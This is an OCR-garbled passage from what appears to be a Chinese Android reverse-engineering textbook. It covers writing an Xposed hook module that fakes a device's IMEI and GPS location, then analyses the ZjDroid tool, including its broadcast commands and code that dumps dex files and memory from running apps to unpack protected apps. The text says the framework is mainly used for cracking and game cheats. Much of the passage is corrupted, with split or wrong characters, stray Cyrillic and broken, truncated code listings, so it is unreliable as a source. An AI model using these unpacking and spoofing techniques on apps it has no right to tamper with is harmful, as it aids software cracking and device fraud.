修复 : 在 这 个 方法 仔 入 map 数 据 之 前 做 一 个 判断 操作 即 可 。 
: Exception in thread " main" brut.androlib. AndrolibException: Could not decode atsc file 


异常 原因 : 通过 分 析 源 码 知 道 ， 这 个 错误 主要 是 因为 apk 做 了 resource.arsc 头 部 信息 的 修改 ， 导 致 在 分 析 头 部 数据 结构 的 时 
候 出 错 。 


错误 代码 : ExtDatalnput.java 的 skipCheckChunkTypelnt 万 法 73 行 。 


修复 : 修复 resource.arsc 头 部 数据 ， 修 改 skipCheckChunkTypelnt 检 测 方 法 逻辑 。 


17.2 ”环境 搭建 


如 果 上 面 的 问题 都 解决 了 ， 表 打开 应 用 ， 点 击 安装 框架 ， 如 图 17-3 所 示 。 
这 里 还 是 提示 未 激活 ， 点 击 进 入 ， 如 图 17-4 所 示 。 


Xposed Installer 


欢迎 使 用 Xposed 安 装 器 
请 选择 您 想 进行 的 操作 : EAL 


ER 
您 能 管理 Xposed 4232 , ERRER EITA 


917-3 ”安装 框架 界面 


| AU нка 
app. process 58 58 
XposedBridge.jar = 54 


ER 


ENEY 


图 17-4 ”框架 激活 状态 图 


这 时 候 看 到 了 正常 了 ， 可 以 点 击 安 次 了， 直接 后 击 安 洲 即 可 ， 如 图 17-5 所 示 。 


“Xposed Installer" 正在 请 求 超 


PR. 


e UU 
记 住 选择 10 分 钟 
«KA CUR BE 


图 17-5 ”安装 界面 


ixEiESESErOOUSTMBS, ААИ, 880202 AU ATEREURAEGAHI, AARE, NEB АЛБАШЫ. 


到 这 里 就 成 功 安 污 了 Xposed 框 架 了 ， 在 这 个 过 程 中 肯定 有 人 会 遇 到 问题 ， 个 舍得 解决 问题 的 最 根本 办 法 就 是 刷机 了 ， 本 
章 操作 的 环境 是 : 小 米 3 移 动 版 +Android 原 生 4.4 系 统 +Xposed v33 版 本 。 


17.3 ”编写 模块 功能 


环境 搭建 好 了 ， 下 面 惑 开始 操作 了 。 上 面 安 委 的 那个 工具 其 实 是 一 个 模块 管理 器 ， 如 果 想 做 一 些 hook 操 作 还 得 目 己 编写 模 
块 ， 然 后 把 这 个 模块 安装 到 设备 中 ， 这 个 工具 束 可 以 检测 出 来 了 ， 会 提示 加 载 这 模块 然后 重启 设备 ， 模 块 功能 束 有 效果 了 。 那 么 
下 面 来 看 一 下 如 何 编写 一 个 Xposed 模 块 。 


第 一 步 : 新 建 模块 项 目 


导入 Xposed 工 具 包 ， 如 图 17-6 所 示 。 


(3 XposedHookDemo 
4 (28 src 
4 cn.wjdiankong.xposedhook 
Main.Java 
MalnActrvity.java 这 里 一 定 要 
-H gen [Generated Java Files | 注意 是 JE lib М 


А Android 6.0 du 而 不 是 
j Referenced Libraries libs 文件 ， 不 
25 assets ЯКТАН 
‚ bin 
© lib 
a XposedBridgeApi- 54.Jar 


917-6 ”模块 工程 


这 里 一 定 要 注意 : 不 能 使 用 libs 文 件 夹 而 要 使 用 lib 文 件 夹 ， 如 果 这 里 使 用 了 libs 文 件 夹 ， 在 安装 模块 成 功 之 后 重启 ， 会 发 现 
Hook 是 失败 的 ， 通 过 打印 tag 为 xposed 的 日 志 信 息 会 上 友 现 这 样 的 错误 : 


Java.lang.IllegalAccessError: Class ref in pre-verified class resolved to 
unexpected implementation 


这 个 错误 主要 是 因为 把 接口 包含 到 了 插件 项 目 中 了 ， 那 么 可 以 猜想 错误 问题 也 是 这 个 Xposed 工 具 导 致 的 。 那 么 只 需要 把 
libs 文 件 夹 改 成 lib 文 件 夹 ， 然 后 用 add buildpath 命 令 即 可 。 


注意 : 在 Eclipse 中 ， 如 果 把 工具 包 放 到 libs 文 件 中 ， 默 认 是 加 入 到 编译 路 径 中 的 ， 同 时 在 编译 出 来 的 程序 中 也 是 包含 了 这 个 
包 中 的 所 有 类 ， 而 对 于 其 他 非 libs 文 件 夹 ， 添 加 工具 包 之 后 执行 add buildpath 只 是 做 到 了 项 目 引 用 工具 包 的 功能 ， 而 最 终 并 不 


会 把 这 个 工具 包 包 含 到 程序 中 。 
第 二 步 : 编写 模块 代码 


编写 模块 代码 只 要 新 建 一 个 实现 IXposedHookLoadPackage 接 口 类 ， 然 后 在 handle-LoadPackage 回 调 方 法 中 进行 拦截 操 
作 即 可 ， 而 具体 的 拦截 操作 是 借助 XposedHelpers.findAndHookMethod 方 法 和 XposedBridge.hookMethod 方 法 实现 的 ， 这 
两 个 方法 从 参数 侣 义 可 以 看 到 ， 主 要 是 需要 Hook 的 类 名 和 方法 名 ， 还 有 一 个 融 是 拦截 的 回调 方法 ， 一 般 是 拦截 之 前 做 什么 的 
beforeHookedMethod 方 法 ， 以 及 拦截 之 后 做 什么 的 afterHookedMethod 方 法 ， 如 图 17-7 所 示 。 


public class Main implements IXposedHookLoadPackage ( 


private void hook_method(String className, ClassLoader classLoader, String methodName, 
Object... parameterTypesAndCallback){ 
try 


XposedHelpers.findAndHookMethod(klassName, classLoader, methodName, parameterTypesAndCallback); 


} catch (Exception e) í 


s | 这 两 个 方法 实现 了 具体 的 Hook 操作 ， 但 有 一 些 区 别 
XposedBridge.Log(e); 
) — 一 个 是 通过 需要 Hook 类 的 名 称 来 进行 内 部 查找 方法 ， 


一 个 是 自己 使 用 反射 找到 具体 方法 


private void hook_methods(String className, String methodName, XC_Method/ook xmh){ 
try { 


Class«?» clazz = Class.forName(className); 
for (Method method : clazz.getDeclaredMethods()) 
if (method.getName().equals(methodName) 
&& !Modifier.isAbstract(method.getModif;j 
&& Modifie LsPuhli method setrtModi*fi 
XposedBridge.hookMethod(method, xmh); 
} 
} catch (Exception e) { 
XposedBridge.Log(e); 在 这 个 回调 方法 中 是 симу" 
} 
} 行 hook 的 所 有 回调 的 地 方 ， 


我 们 后 续 的 hook 拦截 捍 ia 


GOverride 
public void handleloadPackage(final LoadPackageParam lpp) throws Throwable( 要 在 这 个 方法 中 进行 


Log.i("jw", "pkg:"+lpp.packageName); 


h 


hook method("android.telephony.TelephonyManager", lpp.classLoader, "getDevicelId"| new XC MethodHook() í 
GOverritde 
protected void afterHookedMethod(MethodHookParam param) rows Throwable { 

Log.i("jw", "hook getDeviceId..."); 

Object obj - param.getResult(); А, 

Log.i("jw", "imei args:"+obj); 这 里 我 们 Hook 系统 获取 imei 的 方法 ， 第 一 个 参数 是 Hook 的 类 名 称 ， 
param.setResult("jiangwei"); 第 三 个 参数 是 Hook 的 具体 方法 ， 最 后 一 个 参数 是 hook 之 后 的 回调 ， 

}); 一 般 有 before... 和 after... 这 两 个 方法 ， 我 们 也 就 在 这 里 做 一 些 替换 拦 


截 操作 了 ， 在 这 里 我 们 把 系统 返回 的 imei 替换 成 了 “jiangwei” 
17-7 模块 代码 


对 于 I|XposedHookLoadPackage 这 个 接口 和 回调 方法 ， 可 以 知道 ， 应 该 是 拦截 系统 中 所 有 应 用 的 运行 信息 ， 传 递 回来 的 一 
个 LoadPackageParam 参 数 类 型 就 是 包括 了 Hook 应 用 的 县 体 人 信息， 打印 应 用 的 包 名 就 可 以 看 到 效果 了 。 


ЕЕ: 如 果 想 Hook 一 个 类 的 具体 方法 ， 那 么 就 必须 要 清楚 地 了 解 到 这 个 方法 的 详细 信息 ， 比 如 参数 类 型 和 个 数 ， 返 回 类 型 


等 。 因 为 在 拦截 的 过 程 中 必须 要 对 这 个 方法 进行 分 析 ， 比 如 得 到 方法 参数 来 进行 具体 参数 修改 ， 返 回 值 信 息 来 进行 返回 值 修改 。 


看 到 了 获取 imei 什 的 万 法 是 一 个 无 参数 的 返回 字符 串 类 型 的 方法 ， 那 么 如 果 要 拦截 它 的 返回 值 ， 融 需要 修改 它 的 返回 值 ， 使 
用 setResult 方 法 即 可 。 所 以 从 这 里 可 以 看 到 不 管 是 Hook 系 统 的 方法 ， 还 是 以 后 去 Hook 第 三 万 应 用 的 具体 类 方法 ， 第 一 步 都 得 
了 解 到 Hook 对 和 象 的 具体 信息 。 关 于 系统 方法 可 以 通过 得 看 源码 来 得 到 信息 ， 而 对 于 第 三 方 应 用 的 话 只 能 借助 肥 编 译 扩 术 了 ， 比 


如 修改 洲 戏 金币 功能 ， 必 须 先 反 编译 游戏 知道 修改 金币 的 类 和 具体 方法 才 可 行 。 


这 里 不 仅 Hook 了 系统 的 imei 信 息 ， 也 简单 Hook 了 系统 的 地 理 位 置信 息 ， 在 Android 中 获取 经 纬度 信息 有 三 种 方式 ， 这 里 为 
了 演示 简单 ， 用 了 GPS 定 位 功能 ,一 般 获 取经 纬度 信息 的 代码 主要 是 两 处 。 


第 一 处 是 初始 化 的 时 候 调 用 getLastKnowLocation 方 法 获取 最 后 一 次 系统 中 的 地 理 位 置信 息 ， 如 下 代码 : 


/ /获取 地 理 位 置 管理 器 
locationManager = (LocationManager) getSystemService(Context.LOCATION SERVICE); 
/ /3àWBiLocation 


Location location = locationManager|getLastKnownLocation(LocationManager.PASSIVE PROVIDER); 


if(location!-nu11)( 
/ /不 为 空 ,显示 地 理 位 置 经 纬度 
showLocation(location); 


第 二 处 就 是 监听 地 理 位 置 变化 的 回调 接口 中 的 onLocationChanged 回 调 方法 ， 如 下 代码 : 


LocationListener locationListener = пем LocationListener() { 


@Override 


public void onStatusChanged(String provider, int status, Bun 
j 


@Override 
public void onProviderEnabled(String provider) í 


} 


@Override 


public void onProviderDisabled(String provider) { 


j 


@Override 
public void onLocationChanged(Location location 


/ /如 果 位 置 发 生变 化 ,重新 显示 


showLocation(location); 


}; 


如 果 想 Hook 系 统 的 地 理 位 置信 息 进行 拦截 ， 束 需 要 操作 这 两 处 代码 。 而 它们 有 一 个 区 别 ， 第 一 处 是 通过 返回 值得 到 的 ， 第 
二 处 是 通过 回调 方法 中 的 参数 得 到 的 。 下 面 来 看 一 下 具体 的 Hook 代 码 。 


Hook 第 一 处 代码 比较 简单 ， 直 接 构造 一 个 假 的 Location 对 象 ， 然 后 设置 返回 值 即 可 ， 如 下 代码 所 示 : 


/ /定位 
hook methods("android.location.LocationManager", "getLlastKnownLlocation", new XC Me 
@Override 
protected void afterHookedMethod(MethodHookPar'am param) throws Throwable í 
Log.i("jw", "hook getLastKnownLocation..."); 
Location 1 = new Location(LocationManager.PASSIVE PROVIDER); 
double lo = -10000d; //&® 


double la = -10000d; //%® xx Hi EJ Wr — 4 35 ЖИ UR 的 Location 
eene raria d 对 象 ， 然 后 设置 了 我 们 想 要 拦截 的 
paran. setResult(1); 经 纬度 信息 ， 最 后 再 设置 回去 即 可 


} 
115 


Hook 第 二 处 代码 有 点 复杂 ， 需 要 先 找 至 е 然后 通过 反射 得 到 这 个 回调 对 
象 ， 找 到 具体 的 回调 方法 ， 再 进行 操作 ， 因 为 回调 方法 是 通过 参数 把 Location 对 象 传递 回来 的 ， 所 以 这 里 需要 修改 参数 值 。 如 
下 代码 所 示 : 


hook methods("android.location.LocationManager", "requestLocationUpdates", new XC Me 
QGOverride 
protected void afterHookedMethod(MethodHookParam param) throws Throwable { 


Log.i("jw", "hook requestLocationUpdates..."); 


if (param.args.length == 4 && (param.args[0] instanceof String)) { 
LocationListener 11 = (Locationlistener)param.args[3]; 
Class«?» clazz = Locationlistener.class; 
Method m - null; 
for (Method method : clazz.getDeclaredMethods()) { 
if (method.getName().equals("onLocationChanged")) { 
m = method; 


break; 
} 
} 
try (| 
if (m != null) í 
Object[] args = new Object[1]; 
Location 1 = new Location(lLocationManager.PASSIVE PROVIDER); 
double lo = -10000d; //&® 
double la = -10000d; //%® 
l.setLatitude(la); T PTS x dé ` 
l.setLongitude(lo); 这 里 其 实 也 是 一 样 的 效果 ， 因为 地 理 
e Р "EE AG —! --— 
arel] DT ngs) 一 位 置 变 化 的 回调 监听 方法 是 通 E 
} 
Y catch (Exception e) í 形式 传 逆 回 去 的 ， Br AX HUE 后 的 
Log(e); location 对 象 震 要 设置 到 参数 中 " = 


} 
р); 


到 这 里 就 编写 好 了 Hook 系 统 的 imei 值 和 地 理 位 置信 息 的 模块 了 。 
第 三 步 : 添加 模块 入 口 


一 步 是 非常 重要 的 ， 也 是 最 容易 志 记 的 ， 就 是 要 告诉 Xposed 框 架 一 个 模块 中 Hook 的 入 口 ， 可 以 看 到 模块 的 入 口 是 Main 
类 ， 所 以 需要 在 模块 的 assets 中 添加 一 个 xposed_init 文 件 ， 如 图 17-8 所 示 。 


а (E XposedHook 


src 

[> qen [Generated Java Files] 
> mà Android 6.0 

> Em Referenced Libraries 


c assets 


图 17-8 入口 文 件 xposed_init 


这 里 的 内 容 惑 是 模块 入 口 类 的 全 称 名 称 即 可 ， 如 图 17-9 所 示 。 


J] MainActivity.java & activity demo.xml |J] Main.java d| XposedHookDemo Manifest xposed init. £5 


1cn.wjdiankong.xposedhook.Main 
17-9 xposed init x 4F Р] Ж 
第 四 步 : 添加 模块 的 额外 信息 
最 后 一 步 需要 在 模块 的 AndroidManifestxml 文 件 添加 额外 信息 ， 具 体 包 括 模块 的 描述 信息 、 版 本 号 等 ， 如 下 所 示 : 


«meta-data 
android:name- "xposedmoduLle" 
android:value-"true" /» 
«meta-data 
android:name- "xposeddescription" 


апагоіа: ма1ие= "Ноок & 8" /> 
«meta-data 

android:name-"xposedminversion" 

android:value-"30" /» 


其 中 : 


xposedmodule: 是 Android 程 序 作 为 Xposed 中 的 一 个 模块 ， 所 以 值 为 true。 


- xposeddescription: 是 对 本 模块 的 功能 的 描述 ， 可 以 自己 简单 叙述 一 下 就 可 以 了 。 
- xposedminversion: 是 本 模块 开发 时 用 到 的 Xposed 的 jatr 包 最 低 版 本 号 ， 这 里 是 30， 这 里 所 用 的 Xposed 的 jat 包 版 本 是 54。 


经 过 上 面 4 步 之 后 融 完 成 了 模块 的 定义 ， 最 后 为 了 验证 Hook 的 结果 ， 再 新 建 一 个 Activity 类 ， 在 内 部 调用 一 下 系统 的 获取 
ime 方 法 以 及 位 置信 息 万 法 ， 并 且 显 示 和 在 屏幕 中 ， 如 下 代码 所 示 : 


locationTxt = (TextView)findViewById(R.id.Location); 
imeiTxt = (TextView)findViewById(R.id.imei); 


/ /获取 地 理 位 置 管理 器 
locationManager = (LocationManager) getSystemService(Context.LOCATION SERVICE); 
/ /3àWiLocation 
Location location = locationManager.getlastKnownLocation(LocationManager.PASSIVIi 
if(location!-null)( 
/ /不 为 空 ,显示 地 理 位 置 经 纬度 
showLocation(location); 
} 
/ /监视 地 理 位 置 变 化 
locationManager -requestLocationUpdates(LocationManager .PASSIVE PROVIDER, 3000, : 


TelephonyManager telephonyManager = (TelephonyManager) this.getSystemService(Coi 
String imei = telephonyManager.getDeviceId(); 
imeiTxt.setText("imei:"-*imei); 


174 运行 模块 


下 面 丈 来 运行 一 下 模块 程序 ， 安 六 到 设备 之 后 ，Xposed 会 提示 模块 未 激活 ， 如 图 17-10 所 示 。 


这 个 Xposedlnstaller 程 序 工具 应 该 是 通过 接收 安 委 广播 ， 然 后 得 到 这 个 应 用 信息 分 析 它 是 否 包 合 了 Xposed 模 块 的 特殊 属性 
来 判断 的 。 点 击 进行 激活 ， 如 图 17-11 所 示 。 


xposed HHA RAUA 


图 17-10 ”提示 未 激活 信息 


XposedHookDemo 
Hooks SE FE E 


xposed 81$ SIRE SB im 


重启 后 更 改 将 生效 


图 17-11 激活 模块 


这 时 候 看 到 激活 成 功 之 后 ， 会 提示 再 次 重 局 设备 才能 生效 。 每 当 有 新 的 模块 或 者 模块 代码 有 更 新 都 需要 重 局 设备 模块 才 生 
效 ， 如 图 17-12 所 示 。 


这 一 点 还 是 麻烦 的 。 重 局 设备 之 后 ， 表 运行 模块 代码 看 看 效果 ， 如 图 17-13 所 示 。 


从 这 显示 结果 看 到 了 ，Hook 成 功 了 ， 人 在 没有 Hook 之 前 的 效果 是 ， 如 图 17-14 所 示 。 


Ez 
" 


ш 


x] — 
ЕН ЯПЕН & 


(Uy Xposed 模块 已 更 新 


图 17-12 ”提示 模块 更 新 


+) XposedHookDemo 


Imei:Jiangwel 


纬度 : -10000.0 经 度 : -10000.0 


图 17-13 ”运行 结果 


S! XposedHookDemo 


imei:357 ШШШ 175163 


纬度 :GENEENED ,经度 : 10090806475 


图 17-14 ”没有 拦截 之 前 的 运行 效果 


这 时 候 来 看 一 下 打印 的 日 志 信 息 ， 如 下 所 示 : 


IZ ju < 76555: pkg:com.baidu.BaiduMap 

IZ ju < 7696»: pkg:com.baidu.BaiduMap 

IZ ju < 7696»: hook getDeviceld... 

IZju С 7696): imei args:863970029764198 

IZju < 7696»: hook requestLocationUpdates... 
IZ ju < 7696»: hook requestLocationUpdates... 


百度 地 图 在 获取 设备 的 imei 和 位 置信 息 ， 当 然 这 是 符合 正常 情况 的 ， 从 这 里 可 以 看 到 ， 还 可 以 利用 这 个 技术 来 观察 设备 中 有 
哪些 应 用 在 获取 设备 的 一 些 隐私 数据 。 


提示 : 项 目 下 载 地 址 为 https://github.com/fourbrother/xposedhookdemo 


17.5 SEJA 


本 章 主 要 介绍 Xposed 的 基本 使 用 规则 和 方法 ，XposedInstaller.apk 其 实 是 一 个 模块 载体 和 管理 器 ， 如 果 想 实现 具体 的 Hook 操 
作 ， 就 必须 自己 编写 模块 程序 ， 然 后 激活 加 载 方 可 生效 。 在 实际 过 程 中 ， 这 个 框架 是 非常 有 用 的 ， 可 以 通过 修改 系统 的 一 些 信 息 
来 帮助 测试 模拟 复杂 的 测试 环境 ， 但 是 这 个 框架 现在 用 得 最 广泛 的 当 属 破解 操作 ， 比 如 用 这 个 框架 可 以 进行 应 用 的 脱党 ， 编 写 游 


戏 的 外 挂 等 。 


81828  BhsothESZjDroid 


前 面 一 章 介绍 了 Xposed 框 架 工 具 的 基本 使 用 ， 本 章 将 继续 介绍 Xposed 框 架 的 另外 一 个 功能 即 脱党 ， 主 要 是 利用 Xposed 的 脱 沈 
模块 工具 ZjDroid 实 现 的 ， 因 为 它 是 开源 的 ， 所 以 直接 分 析 源 码 即 可 ， 源 码 的 下 载 地 址 : https://github.com/halfkiss/ZjDroid。 不 
过 可 惜 的 是 现在 只 公开 了 Java 层 的 代码 ， 而 native 层 的 代码 并 没有 公开 ， 分 析 源 码 之 后 会 发 现 最 重要 的 功能 就 在 native 层 。 


18.1 了 jpDroid 原 理 分 析 


下 面 惑 来 详细 分 析 一 下 ZjDroid 工 具 的 源码 ， 由 Eclipse 工程 导入 ， 基 于 之 前 的 Xposed 模 块 编写 的 经 验 ， 找 到 入 口 代 码 ， 在 
assets 目 录 下 有 一 个 xposed init 文 件 中 就 记录 了 模块 的 入 口 类 ， 如 图 18-1、 图 18-2 所 示 。 


ү m Z|Droi 


Referenced Libraries 


src 
gen [Generated Java Files] 
Android 4.4.2 


Android Private Libraries 


918-1 хроѕеа init x £F 


|J] ReverseXposedModule.java xposed init LÀ 
1 com. android.reverse.mod.ReverseXposedModule 
图 18-2 xposed init. U 类 


直接 进入 到 这 个 类 即 可 ， 代 码 如 下 : 


public class ReverseXposedModule implements|IXposedHookLoadPackagd { 


private static final String ZJDROID_PACKAGENAME = “com.android.reverse"; 


Auto-generated method stub 
if(lpparam.appInfo == null || 
(lpparam.appInfo.flags & (ApplicationInfo.FLAG SYSTEM | ApplicationIr 
return; 
yelse if(lpparam.isFirstApplication && !ZJDROID PACKAGENAME .equals(lpparam.pe 
Logger.PACKAGENAME - lpparam.packageName; 
Logger.Log("the package = "«lpparam.packageName +" has hook"); 
Logger. Log("the app adipis id = "«android.os.Process.myPid()); 
f f а(1 


э 


ModuleContext. getInstance 


DexFileInfoCollecter. — ут" aS аа: 

LuaScriptInvoker.getInstance().start(); 

ApiMonitorHookManager.getInstance().startMonitor(); 
}е15е{ 


} 


遵循 统一 规则 ， 实 现 了 IXposedHookLoadPackage 接 口 ， 再 实现 handleLoadPackage 回 调 方法 即 可 ， 下 面 继续 分 析 入 口 
方法 ModuleContext， 代 码 如 下 : 


public void ünitModuleContext(PackageMetaInfo info) { 


this.metaInfo - info; 
String appClassName - this.getAppInfo().className; 
if (appClassName -- null) ( 

Method hookOncreateMethod = пи11; 


try { 
hookOncreateMethod 4 Application.class.getDeclaredMethod("onCreate", new Class[] ()); 


) catch (NoSuchMethodException e 


// TODO Auto-generated catch block| 在 这 里 始 Hook = Ж 的 Application 的 
e.printStackTrace(); 、 
) onCreate 方法 了 。 
hookhelper.hookMethod(hookOncreateMethod, new ApplicationOnCreateHook()); 
) else í 
Class«?» hook application class - null; 
try { 


hook application class = this.getBaseClassLloader().loadClass(appClassName); 
if (hook application class !- null) { 
Method hookOncreateMethod - hook application class.getDeclaredMethod("onCreate", r 
if (hookOncreateMethod !- null) ( 
hookhelper.hookMethod(hookOncreateMethod, new ApplicationOnCreateHook()); 


1 


这 里 开始 拦截 Application 的 onCreate 方 法 ， 而 这 人 1 是 每 个 应 用 程序 的 启动 方法 ， 在 这 里 做 拦截 操作 也 是 合情合理 
的 ， 表 看 拦截 之 后 做 了 什么 ， 也 残 是 ApplicationOnCreateHook 类 的 实现 ， 代 码 如 下 : 


private class ApplicationOnCreateHook extends MethodHookCallBack í 


public void beforeHookedMethod(HookParam param) í 的 应 用 都 会 在 启动 的 时 候 注 册 这 
// TODO Auto-generated method stub 个 广播 ， 那么 后 面 如 果 发 送 了 这 
} 个 action 的 广播 ， 每 个 应 用 程序 都 
可 以 接收 到 了 ， 这 样 也 就 实现 了 

EE 注入 每 个 应 用 程序 中 的 代码 。 


public void afterHookedMethod(HookParam param) í 
// TODO Auto-generated method stub| 
1 !HAS_REGISTER_LISENER 
fristApplication = (Application) param.thisObject; 
IntentFilter filter = new IntentFilter(CommandBroadcastReceiver.INTENT ACTION) 


fristApplication.registerReceiver(new CommandBroadcastReceiver(), filter); 
HAS REGISTER LISENER - true; 


在 这 里 开始 真正 的 拦截 操作 ， 主 要 是 添加 了 一 个 广播 ， 每 个 应 用 在 局 动 的 时 候 都 会 去 注册 这 个 广播 ， 而 如 果 后 续 使 用 该 工具 
发 送 这 样 对 应 Action 广 播 的话 ， 每 个 应 用 程序 都 会 收 到 。 所 以 这 里 可 以 看 到 ， 核 心 工作 就 在 这 个 广播 的 接收 之 后 做 了 ， 接 下 来 
继续 去 看 这 个 广播 的 定义 ， 代 码 如 下 : 
@Override 
public void onReceive(final Context arg0, Intent arg1) í 


// TODO Auto-generated method stub 
if (INTENT ACTION.equals(arg1.getAction())) í 


i Laf (pid == android.os.Process.myPia 
RA E String cmd = argl.getStringExtra(COMMAND NAME KEY); 
H I 9 1 


o final CommandHandler handler = CommandHandlerParser 


后 下 面 对 pid 做 过 .parserCommand( cmd ) ; 这 里 是 获取 一 个 命令 字符 串 ， 
Е, МАМАНА if (handler != nu11) í 然后 下 面 使 用 类 再 解析 这 个 
用 才 会 处 理 下 面 的 new Thread(new Runnable() ( ”命令 得 到 具体 的 执行 类 ， 这 
工作 ， 对 于 人 应 @Override 里 就 用 到 了 Java 中 著名 的 设 
用 肯定 不 用 处 理 B public void run() { 计 模 式 ， 命 令 模式 


应 用 的 广播 了 TODO Auto-generated method stub 
handler.doAction(); 


J).start(); 
}е15е{ 


Logger..Log( "the cmd is invalid"); 


) 


; 
y catch (Exception e) í 


// TODO Auto-generated catch block 
e.printStackTrace(); 


果然 在 这 里 ， 可 以 看 到 首先 会 通过 发 送 广 播 的 intent 中 携带 一 些 数据 过 来 ， 主 要 是 两 个 数据 : 


‚ 进程 id: 作用 主要 是 为 了 过 滤 其 他 应 用 ， 只 处 理 本 应 用 的 逻辑 ， 因 为 这 个 广播 发 送 之 后 所 有 的 应 用 都 能 接收 到 ,但 是 脱 这 
时 肯定 只 是 针对 于 菜 一 个 应 用 ， 那 么 只 需要 在 这 个 应 用 的 广播 接收 中 做 处 理 即 可 。 


Aa: 是 为 了 发 送 广播 可 以 支持 多 种 功能 ， 后 面 分 析 也 可 以 看 到 的 确 有 很 多 功能 。 


得 到 命令 之 后 束 开 始 构造 一 个 执行 器 类 ， 这 里 用 到 了 设计 模式 中 的 命令 模式 。 下 面 继 续 看 看 有 哪儿 种 命令 执行 器 类 ， 代 码 如 


nand(String cmd) í 


ITO TA 


和 格式 的 字符 串 内 容 


+гу 
JSONObject jsoncmd = new JSONObject(cmd); 


string. action = E. getString(ACTION. NAME KEY); 
一 获取 应 用 dex 信息 的 命令 


if 


String dexpath - 
handler - new танан Тао аин daxcath 


MPDEXCLASS) ; 


dump 出 内 存 中 dex 文件 的 命令 


Logger.Log("please set the " + PARAM DEXPATH DUMPDEXCLASS + " value"); 


dump 出 内 存 中 的 smali 代码 的 命令 


)UMPDEXCLASS ) ; 


} elfe 1 SACK ` .equals(action 
f (jsoncmd.has(PARAM DEXPATH DUMPDEXCLASS)) (í 

String dexpath = jsoncmd.getString(PARAM DEXPATH _ 
handler = пем BackSmaliCommandHandler(dexpath); 


Logger. Log("please set the " + PARAM DEXPATH DUMPDEXCLASS + " value"); 


h 
) else if (ACTION DUMP DEXCLASS .equals(action)) í 


String dexpath - jsoncmd.getString(PARAM DEXPATH DUMP DEXFILE); 


handler - new DumpClassCommandHandler(dexpath); 


Logger.Log("please set the " + PARAM DEXPATH DUMPDEXCLASS + " value"); 


z > j Д UN DUMP НЕАР „еаца z LOn 
[handler < mew DumpHespCommandtandlen()] + 获取 应 用 " 准 门 存 数据 
) else if (ACTION INVOKE SCRIPT.equals(action)) í 
if (jsoncmd.has(FILE SCRIPT)) ( 
String filepath - jsoncmd.getString(FILE SCRIPT); 
handler - new InvokeScriptCommandHandler(filepath, ScriptType.FILETYPE); 
y else í 
Logger..Log( "please set the " + FILE SCRIPT); 


; - dump 出 指定 内 存 地 址 的 起 始 
位 置 和 长 度 的 内 存 数据 


int start jsoncmd. te START DUMP MEMERY); 


2A. » 一 一 E J —— T 1 / гл гулаа ¿ai Tiri гы гааг aarmaarm nv 


182 工具 命令 分 析 


下 面 天 来 逐一 分 析 这 个 工具 支持 哪 几 种 命令 。 
1.dump dexinfo 


获取 应 用 运行 时 内 存 中 dex 的 信息 DumpDexlnfoCommandHandler， 代 码 如 下 : 


public class DumpDexInfoCommandHandler implements CommandHandler í 


3 ()jOverride 
public void doAction() { 
HashMap«String, DexFileInfo» 
DexFileInfoCollecter J 

Iterator«DexFileInfo» itor - 
DexFileInfo info = null; 
Logger.Log("The DexFile Infomation -»"); 
while (itor.hasNext()) 1 

info - itor.next(); 

Logger.Log("filepath:"* info.getDexPath()*" тСоокіе: "+іп 


} 
Logger..Log( "End DexFile Infomation"); 


进入 方法 详细 查看 一 下 : 


public HashMap«String, DexFileInfo» dumpDexFileInfo() í 
HashMap«String, DexFileInfo» dexs - new HashMap«String, DexFileInfo»(dynLoadedDexInfo); 
Object dexPathList = RefInvoke.getFieldOjbect("dalvik.system.BaseDexClassLoader", 
pathCLassLoader, "pathList"); 
Object[] dexElements = (Object[]) RefInvoke.getFieldOjbect("dalvik.system.DexPathLlist", 
dexPathList, "dexElements"); 
DexFile dexFile - null; 
for (int i = Ө; i < dexElements.length; і++) í 
dexFile - (DexFile) RefInvoke.getrieldOjbect(^dalvik.system.DexPathList$Element", 
dexElements[i], "dexFile"); 
String mFileName - iode RefInvoke. sabor mae 


int mCookie - 
DexFileInfo dexinfo = new DexFileInfo ileName, nCookie, ДИРЕТ 


| dexs.put(mFileName, dexinfo); E 这 个 cookie 非常 重要 ， 后 面 都 会 用 到 这 个 值 ， 
return dexs; 是 每 个 应 用 的 dex 信息 在 底层 的 唯一 id 但 


可 以 看 到 ， 这 里 的 实现 逻辑 是 ， 全 部 通过 反射 机 制 获 取 每 个 应 用 的 dex 文 件 对 应 的 DexFile 类 型 对 象 ， 这 里 的 工作 和 Android 
中 插件 化 开发 逻辑 有 点 类 似 ， 通 过 应 用 的 默认 类 加 载 PathClassLoader 类 得 到 DexPathList 类 ， 然 后 再 得 到 具体 的 DexFile 对 象 即 
HJ, 


这 里 要 说 的 就 是 这 个 dex 文 件 对 应 的 cookie 值 ， 这 个 值 非 常 重 要 ， 是 后 续 命 令 操作 的 基本 信息 ， 它 代表 的 含义 就 是 底层 中 每 
个 应 用 的 dex 文 件 对 应 的 唯一 id 值 ， 系 统 会 维护 一 个 map 结 构 来 保存 这 些 数据 ， 然 后 通过 这 个 cookie 值 找到 对 应 的 dex 文 件 信 


IOo 
命令 用 法 : 


am broadcast -a com.zjdroid.invoke --ei target [pid] --es cmd 'í"action":"dump 
dexinfo")' 


2В872567 205) — 1] $8, JXI--ei b а Aint, jEiJ--esfEipap ç EB, 
2.dump dexfile 


这 个 命令 也 是 后 续 脱 壳 的 重要 命令 ， 右 是 dump 出 应 用 内 存 中 的 dex 文 件 DumpDex-FileCommandHandler， 代 码 如 下 : 


public class DumpDexFileCommandHandler implements CommandHandler í 
private String dexpath; 


public DumpDexFileCommandHandler(String dexpath) { 


this.dexpath - dexpath; dump 出 之 后 的 文件 保存 在 本 应 用 
HJ /data/data/xxx/files H>< F, ifi] 
Ez / 
@Override dexpath z E m Ж dump 的 应 用 程序 
public void doAction() { 路 径 ， 一 般 是 /data/app/xxx.apk 


// TODO Auto-generated method stub | 
String filename - ModuleContext. ене. gejf.ppContext ( ) 


这 里 可 以 看 到 dump 出 应 用 的 内 存 数据 ， 首 先 需要 传 入 源 应 用 的 dex 数 据 ， 也 就 是 apk 文 件 ， 这 一 般 都 是 人 存放 
在 /data/app/xxx.apk 目 录 下 的 ， 然 后 构建 了 一 个 dump 之 后 的 dex 文 件 路 径 ， 通 过 源码 查看 是 
在 /data/data/xxx/files/dexdump.odex 中 。 接 下 继续 查看 dump 的 核心 代码 : 


public void dumpDexFile(String filename, String dexPath) { 
File file = new File(filename); 
try { 
if (!file.exists()) 
file.createNewFile(); 
int mCookie = this.getCookie(dexPath); 
if (mCookie != @) í 
FileOutputStream out = new FileOutputStream(file); 
= NativeFunction.dumpDexFiLeByCooRt1e(mCook1e, 
ModuleContext.getInstance().getApiLevel()); 
